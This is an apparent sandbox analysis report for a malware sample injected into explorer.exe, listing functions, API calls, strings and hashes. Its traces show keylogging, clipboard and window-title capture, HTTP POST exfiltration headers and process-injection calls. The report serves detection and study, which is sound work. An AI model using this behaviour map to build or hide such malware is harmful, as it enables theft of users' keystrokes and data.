                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 006D1448
                        • GetLastError.KERNEL32 ref: 006D144E
                        • RtlInitializeCriticalSection.NTDLL(006D582C), ref: 006D1465
                        • Sleep.KERNEL32(000001F4), ref: 006D1489
                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 006D14A6
                        • GetProcAddress.KERNEL32(00000000), ref: 006D14AF
                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 006D14D0
                        • GetProcAddress.KERNEL32(00000000), ref: 006D14D3
                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 006D14F1
                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 006D150D
                        • CloseHandle.KERNEL32(00000000), ref: 006D1514
                        • RtlExitUserThread.NTDLL(00000000), ref: 006D152A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                        • API String ID: 3628807430-1779906909
                        • Opcode ID: 75773266a41a16c1a05c4273518555dcd619def1204ab9ffdf5b8388e88ebe09
                        • Instruction ID: 480ba855b3c59a6bffcb10cf718a238f6ca86c45c3f44ccb73646c5cd93ee57f
                        • Opcode Fuzzy Hash: 75773266a41a16c1a05c4273518555dcd619def1204ab9ffdf5b8388e88ebe09
                        • Instruction Fuzzy Hash: 3641D4B0E01315BBD710AF66EC19D5F3BAFEB85751B01902BF506CA391CBB5D9008BA2
                        Function 006D16B9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • RtlEnterCriticalSection.NTDLL(006D582C), ref: 006D16C4
                        • lstrlenW.KERNEL32 ref: 006D16DB
                        • lstrlenW.KERNEL32 ref: 006D16F3
                        • wsprintfW.USER32 ref: 006D1743
                        • GetForegroundWindow.USER32 ref: 006D174E
                        • GetWindowTextW.USER32(00000000,006D5850,00000800), ref: 006D1767
                        • GetClassNameW.USER32(00000000,006D5850,00000800), ref: 006D1774
                        • lstrcmpW.KERNEL32(006D5020,006D5850), ref: 006D1781
                        • lstrcpyW.KERNEL32(006D5020,006D5850), ref: 006D178D
                        • wsprintfW.USER32 ref: 006D17AD
                        • lstrcatW.KERNEL32 ref: 006D17C6
                        • RtlLeaveCriticalSection.NTDLL(006D582C), ref: 006D17D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                        • String ID: Clipboard -> $ New Window Caption -> $ Pm$%s%s%s$%s%s%s%s$PXm
                        • API String ID: 2651329914-3437734405
                        • Opcode ID: ea5324274c39f1a0f8919a47040b588057687f8aa6ffc9b475e1819442ca5593
                        • Instruction ID: b2258e8e4cf18ca960ef75b52ebdd83d5677f4da349efd4364f3084c24a8113a
                        • Opcode Fuzzy Hash: ea5324274c39f1a0f8919a47040b588057687f8aa6ffc9b475e1819442ca5593
                        • Instruction Fuzzy Hash: 5521E534D02635BBC3302B25FC89E6F3FABEB82B557055027F4029A771CA618E0197B6
                        Function 006D25F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 006D2603
                        • GetCurrentThreadId.KERNEL32 ref: 006D260B
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 006D261B
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 006D2629
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 006D2648
                        • SuspendThread.KERNEL32(00000000), ref: 006D2658
                        • CloseHandle.KERNEL32(00000000), ref: 006D2667
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 006D2677
                        • CloseHandle.KERNEL32(00000000), ref: 006D2682
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 00294b8335427b1d5e160748e4839e724f48200aa6e7f624c9a0349325ff5925
                        • Instruction ID: 859902673c3f85e41600b983fdc1f7e6a5ec331924cd79def9cb13a742cdb3c5
                        • Opcode Fuzzy Hash: 00294b8335427b1d5e160748e4839e724f48200aa6e7f624c9a0349325ff5925
                        • Instruction Fuzzy Hash: 96117C31C06361EFD7019F60AC4CA6EBBA6EF95701F04046BFA4592350D730CA498BA3
                        Function 006D20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 295 6d20a1-6d20fc call 6d240f call 6d2a09 call 6d298a call 6d24cc 304 6d20fe-6d2115 295->304 305 6d2117-6d2123 295->305 308 6d2127-6d2129 304->308 305->308 309 6d23fd-6d240c call 6d29eb 308->309 310 6d212f-6d2166 RtlZeroMemory 308->310 314 6d216c-6d2187 310->314 315 6d23f5-6d23fc 310->315 316 6d21b9-6d21cb 314->316 317 6d2189-6d219a call 6d243d 314->317 315->309 322 6d21cf-6d21d1 316->322 323 6d21ad 317->323 324 6d219c-6d21ab 317->324 325 6d21d7-6d2233 call 6d288d 322->325 326 6d23e2-6d23e8 322->326 327 6d21af-6d21b7 323->327 324->327 335 6d2239-6d223e 325->335 336 6d23db 325->336 330 6d23ea-6d23ec call 6d29eb 326->330 331 6d23f1 326->331 327->322 330->331 331->315 337 6d2258-6d2286 call 6d2a09 wsprintfW 335->337 338 6d2240-6d2251 335->338 336->326 341 6d229f-6d22b6 337->341 342 6d2288-6d228a 337->342 338->337 348 6d22b8-6d22ee call 6d2a09 wsprintfW 341->348 349 6d22f5-6d230f 341->349 343 6d228b-6d228e 342->343 344 6d2299-6d229b 343->344 345 6d2290-6d2295 343->345 344->341 345->343 347 6d2297 345->347 347->341 348->349 353 6d23b8-6d23ce call 6d29eb 349->353 354 6d2315-6d2328 349->354 362 6d23d7 353->362 363 6d23d0-6d23d2 call 6d29eb 353->363 354->353 357 6d232e-6d2344 call 6d2a09 354->357 364 6d2346-6d2351 357->364 362->336 363->362 366 6d2365-6d237c 364->366 367 6d2353-6d2360 call 6d29ce 364->367 371 6d237e 366->371 372 6d2380-6d238d 366->372 367->366 371->372 372->364 373 6d238f-6d2393 372->373 374 6d23ad-6d23b4 call 6d29eb 373->374 375 6d2395-6d23a7 call 6d29bd RtlMoveMemory 373->375 374->353 375->374
                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                          • Part of subcall function 006D298A: lstrlen.KERNEL32(006D4FE2,?,00000000,00000000,006D20DD,74DE8A60,006D4FE2,00000000), ref: 006D2992
                          • Part of subcall function 006D298A: MultiByteToWideChar.KERNEL32(00000000,00000000,006D4FE2,00000001,00000000,00000000), ref: 006D29A4
                          • Part of subcall function 006D24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 006D24DE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 006D2139
                        • wsprintfW.USER32 ref: 006D2272
                        • wsprintfW.USER32 ref: 006D22DD
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006D23A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 07cc257e1b9fa745ef0a677a4878cb066bfec38402d1a78e03f64e7b85c423d6
                        • Instruction ID: 034ddbd0a0100d1c2163c449e9cf49ffbd3ae11271658f3295023b8543888bb0
                        • Opcode Fuzzy Hash: 07cc257e1b9fa745ef0a677a4878cb066bfec38402d1a78e03f64e7b85c423d6
                        • Instruction Fuzzy Hash: 27A19C70A09352AFD3509F69DC94A6BBBEAFF98740F04082EF985C7351DA34DE058B52
                        Function 006D24CC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 380 6d24cc-6d24f0 RtlZeroMemory 382 6d2514 380->382 383 6d24f2-6d2504 380->383 385 6d2517-6d2519 382->385 383->382 384 6d2506-6d2512 383->384 384->385 386 6d251b-6d2545 385->386 387 6d2554-6d2559 385->387 390 6d254c-6d2553 386->390 391 6d2547-6d254a 386->391 390->387 391->390
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000018), ref: 006D24DE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: MemoryZero
                        • String ID: m$Om$Om$Om m
                        • API String ID: 816449071-3996221232
                        • Opcode ID: 1ac4df0a3d32894c8c77d8f7635b44e0cf1878a859df605823c528c2aeee8ae9
                        • Instruction ID: c390095652c1b1479e6e48642c20909a90229b9ddee26cb460b63c783654e4a5
                        • Opcode Fuzzy Hash: 1ac4df0a3d32894c8c77d8f7635b44e0cf1878a859df605823c528c2aeee8ae9
                        • Instruction Fuzzy Hash: 3811ECB1A0121AAFDB10DFA9E894EBEB7BDEB58701B10002AF945D7340D7309D45CB61
                        Function 006D182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42sleepstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • RtlEnterCriticalSection.NTDLL(006D582C), ref: 006D1839
                        • lstrlenW.KERNEL32 ref: 006D1845
                        • RtlLeaveCriticalSection.NTDLL(006D582C), ref: 006D18A9
                        • Sleep.KERNEL32(00007530), ref: 006D18B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                        • String ID: ,Xm
                        • API String ID: 2134730579-2406984751
                        • Opcode ID: 0c939ab1d9b5c2c95f0a077c2f1d87fcdb0c31c758eaf5a7655f7689cc7e1981
                        • Instruction ID: 6b265d87ddb8047eba0714a7663f3c91dccb8fbeb50323ef7a83a72a85d1c5d7
                        • Opcode Fuzzy Hash: 0c939ab1d9b5c2c95f0a077c2f1d87fcdb0c31c758eaf5a7655f7689cc7e1981
                        • Instruction Fuzzy Hash: 6101A770D12511ABD354AB65ED29C6E3BABEB42700704002FF002CB361DA709D01A7B6
                        Function 006D12AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006D29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,006D12D9,00000000,00000000,?,00000001), ref: 006D29C7
                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 006D12DC
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 006D138A
                          • Part of subcall function 006D2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,006D1119,00000001), ref: 006D2850
                          • Part of subcall function 006D2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,006D1119,00000001), ref: 006D2855
                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 006D1316
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D1332
                          • Part of subcall function 006D2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,006D136E), ref: 006D2591
                          • Part of subcall function 006D2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 006D259A
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D135F
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                        • String ID:
                        • API String ID: 2993730741-0
                        • Opcode ID: 899dd13014fc575361296444295444b24d69a463d01dc8e8fe9b88367cf8939d
                        • Instruction ID: 43ff3a5003200a2377f631cdf0b0ce0c394a9f1a38b482a1fd3a0e7dc2e4ee54
                        • Opcode Fuzzy Hash: 899dd13014fc575361296444295444b24d69a463d01dc8e8fe9b88367cf8939d
                        • Instruction Fuzzy Hash: B121A070F04212AFC344EF29986597EB7DBAB95700B11052FF852DB341DB74DD098BA6
                        Function 006D1581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                        Download Yara Rule
                        APIs
                        • GlobalFix.KERNEL32(00000000), ref: 006D15A9
                        • lstrlenW.KERNEL32(00000000), ref: 006D15C6
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 006D15DC
                        • lstrlenW.KERNEL32(00000000), ref: 006D1600
                        • GlobalUnWire.KERNEL32(00000000), ref: 006D161C
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Globallstrlen$Wirelstrcat
                        • String ID:
                        • API String ID: 2993198917-0
                        • Opcode ID: 137f7b036c701f0e1143a0355f0b824bdd0b54b811f719a18e1b0305dd41a246
                        • Instruction ID: d648a2122a0c4b028cf3e7ac60ba1fac99eaded08a6ffd0b6f755dd8cdf69648
                        • Opcode Fuzzy Hash: 137f7b036c701f0e1143a0355f0b824bdd0b54b811f719a18e1b0305dd41a246
                        • Instruction Fuzzy Hash: A901E572E001527B8765677A7D685FE63AFDFD7310708402BF407DA312DEA8CD024251
                        Function 006D1BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 006D1BF4
                        • LoadLibraryA.KERNEL32(?,006D5848,00000000,00000000,74DF2EE0,00000000,006D19B6,?,?,?,00000001,?,00000000), ref: 006D1C1C
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 006D1C49
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 006D1C9A
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
                        • API String ID: 3827878703-0
                        • Opcode ID: 4d408069c2d19563a8b557b66a259adbb1fb81eca0fcf8f1fdf4e0c5a46d811b
                        • Instruction ID: 06598130baee1d91e5768b9118dd90c19bb703f3056438665b2bef180dd1ca24
                        • Opcode Fuzzy Hash: 4d408069c2d19563a8b557b66a259adbb1fb81eca0fcf8f1fdf4e0c5a46d811b
                        • Instruction Fuzzy Hash: E6318271B50615BFCB18CF29C984BA6B7A9BF16314B14452EE846CB300D7B9E845CBA0
                        Function 006D26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,006D11DD), ref: 006D26DB
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 006D26ED
                        • IsWow64Process.KERNEL32(00000000,?), ref: 006D2700
                        • CloseHandle.KERNEL32(00000000), ref: 006D2716
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID:
                        • API String ID: 331459951-0
                        • Opcode ID: 65a8d890ef7ee2c307396c038ff9e5a504e6b79ef77cc7e38030c9c56288d8ed
                        • Instruction ID: 3c7a4472c6a394c718a640995c2e18d616f289522ddc4a0fe061649e9dee513a
                        • Opcode Fuzzy Hash: 65a8d890ef7ee2c307396c038ff9e5a504e6b79ef77cc7e38030c9c56288d8ed
                        • Instruction Fuzzy Hash: 1EF05475D02229FF9B21CFA09D588EEB7BEEF05355B14126BE91493340D7314F4096B1
                        Function 006D17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • GetLocalTime.KERNEL32(?,00000000), ref: 006D17F3
                        • wsprintfW.USER32 ref: 006D181D
                        Strings
                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 006D1817
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                        • API String ID: 377395780-613334611
                        • Opcode ID: f1a10a7120362e64a502e40b7d5d24def8e25bc1eebebd7b94039c52f4e9a6b1
                        • Instruction ID: ba4f0659a995e1ecbf58ed980fd8da33ce6bd06c94d97fe3fe8393f5797fba46
                        • Opcode Fuzzy Hash: f1a10a7120362e64a502e40b7d5d24def8e25bc1eebebd7b94039c52f4e9a6b1
                        • Instruction Fuzzy Hash: 3AF03066D00138BA87146BDA9D059FFB3FDEB0DB02B00019BFA41E1280E6785A90D3B5

                        Execution Graph

                        Execution Coverage:13%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:19
                        Total number of Limit Nodes:3
                        execution_graph 892 43b4a8 897 43b4ad 892->897 893 43b595 LoadLibraryA 893->897 895 43b5f0 VirtualProtect VirtualProtect 896 43b67e 895->896 896->896 897->893 897->895 898 43b5e5 897->898 899 43b358 900 43b35a 899->900 902 43b458 900->902 903 43b4a8 900->903 908 43b4ad 903->908 904 43b595 LoadLibraryA 904->908 906 43b5f0 VirtualProtect VirtualProtect 907 43b67e 906->907 907->907 908->904 908->906 909 43b5e5 908->909 909->902 910 43b2be 911 43b2c2 910->911 912 43b4a8 3 API calls 911->912 913 43b458 911->913 912->913

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00432DC0 82 Function_00431838 0->82 1 Function_004327C4 2 Function_004334C4 6 Function_00431C4C 2->6 19 Function_00431860 2->19 30 Function_00431C6C 2->30 37 Function_00431BF8 2->37 49 Function_00431D04 2->49 50 Function_00432A04 2->50 53 Function_00431A88 2->53 61 Function_00433394 2->61 70 Function_00431D24 2->70 73 Function_00431CAC 2->73 2->82 84 Function_004319BC 2->84 3 Function_0043B148 4 Function_00434048 5 Function_0043ABCF 7 Function_0043AAD2 8 Function_004318D0 9 Function_0043ABD7 10 Function_00431254 11 Function_004314D4 12 Function_00431D54 13 Function_0043B15B 14 Function_0043B358 71 Function_0043B4A8 14->71 15 Function_00433158 16 Function_0043B2DF 17 Function_00431FDC 38 Function_004318F8 17->38 17->82 18 Function_0043AFE3 19->30 20 Function_00431560 21 Function_00432664 22 Function_0043ADEA 23 Function_0043B46A 24 Function_0043C0E9 25 Function_0043A8E8 26 Function_00432768 69 Function_004327A0 26->69 27 Function_004318E8 28 Function_00433068 28->19 28->30 75 Function_00432E2C 28->75 81 Function_00431938 28->81 28->82 29 Function_0043156C 31 Function_0043AFF6 32 Function_00431576 33 Function_004320F4 33->8 33->17 33->19 33->38 56 Function_0043188C 33->56 57 Function_00431F0C 33->57 74 Function_004320AC 33->74 33->82 33->84 34 Function_00431EFA 35 Function_004314F9 36 Function_00435579 39 Function_004326F8 39->21 39->30 46 Function_00432580 39->46 40 Function_00431EF8 41 Function_00434203 42 Function_0043A881 43 Function_00431F00 44 Function_0043AD00 45 Function_00431000 47 Function_0043B007 48 Function_00431405 50->1 50->30 63 Function_00432918 50->63 51 Function_00435289 52 Function_00431508 54 Function_0043AC8D 55 Function_0043370C 55->2 55->30 55->55 76 Function_004331AC 55->76 55->82 56->82 58 Function_0043B291 59 Function_00431B10 60 Function_00434817 61->8 61->19 61->27 61->40 61->53 66 Function_00431E9C 61->66 61->82 62 Function_00432D14 62->19 62->27 67 Function_00431E1C 62->67 80 Function_004324B8 62->80 62->82 64 Function_0043141D 65 Function_0043AB9C 67->82 68 Function_00431822 71->23 72 Function_004325A8 72->8 72->26 72->46 74->53 75->0 75->19 75->56 76->12 76->19 76->39 76->59 76->72 76->82 77 Function_00434233 78 Function_004314B2 79 Function_0043AAB0 80->19 80->33 80->82 81->19 81->82 83 Function_0043B2BE 83->71 85 Function_00432FBC 85->75

                        Executed Functions

                        Function 0043370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 112 43370c-43371c call 431c6c 115 433722-433754 call 431838 112->115 116 4337b0-4337b5 112->116 120 433756-43375b call 431838 115->120 121 433785-4337aa NtUnmapViewOfSection 115->121 123 433760-433779 120->123 125 4337bc-4337cb call 4334c4 121->125 126 4337ac-4337ae 121->126 123->121 131 4337d5-4337de 125->131 132 4337cd-4337d0 call 43370c 125->132 126->116 127 4337b6-4337bb call 4331ac 126->127 127->125 132->131
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 0043378C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                        • Instruction ID: 1d1f43e4b5d59993d235f72522f3a47d77a97494e5c8479a36937122905a8525
                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                        • Instruction Fuzzy Hash: B011E6746019090BFB5CFBB9989D27633D1E71C312F14942FA815C73A2DE3D8A808308
                        Function 004334C4 Relevance: 12.2, APIs: 8, Instructions: 195processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00431BF8: OpenFileMappingA.KERNEL32 ref: 00431C0F
                          • Part of subcall function 00431BF8: MapViewOfFile.KERNELBASE ref: 00431C2E
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 004335B7
                        • Process32First.KERNEL32 ref: 004335DA
                        • CharLowerA.USER32 ref: 004335EE
                        • lstrcmpi.KERNEL32 ref: 0043360C
                        • Process32Next.KERNEL32 ref: 004336CD
                        • FindCloseChangeNotification.KERNELBASE ref: 004336DE
                        • SysFreeMap.PGOCR ref: 004336F7
                        • SleepEx.KERNEL32 ref: 00433701
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: FileProcess32$ChangeCharCloseCreateFindFirstFreeLowerMappingNextNotificationOpenSleepSnapshotToolhelp32Viewlstrcmpi
                        • String ID:
                        • API String ID: 3414437237-0
                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                        • Instruction ID: 5382c61a7e1cf783e640c1d2b86c7ff6f24b88d73603cc446b73b9c85c58cf4d
                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                        • Instruction Fuzzy Hash: EE51A730208A089FDB19FF29D8596AA73E1EB98315F44561EE45BC32B1DF3CDA058785
                        Function 0043B4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 53 43b4a8-43b4ab 54 43b4b5-43b4b9 53->54 55 43b4c5 54->55 56 43b4bb-43b4c3 54->56 57 43b4c7 55->57 58 43b4ad-43b4b3 55->58 56->55 59 43b4ca-43b4d1 57->59 58->54 61 43b4d3-43b4db 59->61 62 43b4dd 59->62 61->62 62->59 63 43b4df-43b4e2 62->63 64 43b4f7-43b504 63->64 65 43b4e4-43b4f2 63->65 77 43b506-43b508 64->77 78 43b51e-43b52c call 43b46a 64->78 66 43b4f4-43b4f5 65->66 67 43b52e-43b549 65->67 66->64 68 43b57a-43b57d 67->68 70 43b582-43b589 68->70 71 43b57f-43b580 68->71 73 43b58f-43b593 70->73 72 43b561-43b565 71->72 75 43b567-43b56a 72->75 76 43b54b-43b54e 72->76 79 43b5f0-43b5f9 73->79 80 43b595-43b5ae LoadLibraryA 73->80 75->70 81 43b56c-43b570 75->81 76->70 86 43b550 76->86 82 43b50b-43b512 77->82 78->54 83 43b5fc-43b605 79->83 85 43b5af-43b5b6 80->85 87 43b572-43b579 81->87 88 43b551-43b555 81->88 100 43b514-43b51a 82->100 101 43b51c 82->101 89 43b607-43b609 83->89 90 43b62a-43b67a VirtualProtect * 2 83->90 85->73 92 43b5b8 85->92 86->88 87->68 88->72 99 43b557-43b559 88->99 94 43b60b-43b61a 89->94 95 43b61c-43b628 89->95 96 43b67e-43b683 90->96 97 43b5c4-43b5cc 92->97 98 43b5ba-43b5c2 92->98 94->83 95->94 96->96 102 43b685-43b694 96->102 103 43b5ce-43b5da 97->103 98->103 99->72 104 43b55b-43b55f 99->104 100->101 101->78 101->82 107 43b5e5-43b5ef 103->107 108 43b5dc-43b5e3 103->108 104->72 104->75 108->85
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0043B5A7
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0043B651
                        • VirtualProtect.KERNELBASE ref: 0043B66F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.000000000043A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0043A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_43a000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                        • Instruction ID: 71efbecba8c52c81b72467a4ae83a0e6644ce0e50a2de75b5ee4ad581bf2f792
                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                        • Instruction Fuzzy Hash: 9851683275491D5BDB24AA389C843F5B7C1F76D329F181A2BC69AC3385E75CC84683CA
                        Function 00431BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 109 431bf8-431c18 OpenFileMappingA 110 431c3b-431c48 109->110 111 431c1a-431c38 MapViewOfFile 109->111 111->110
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
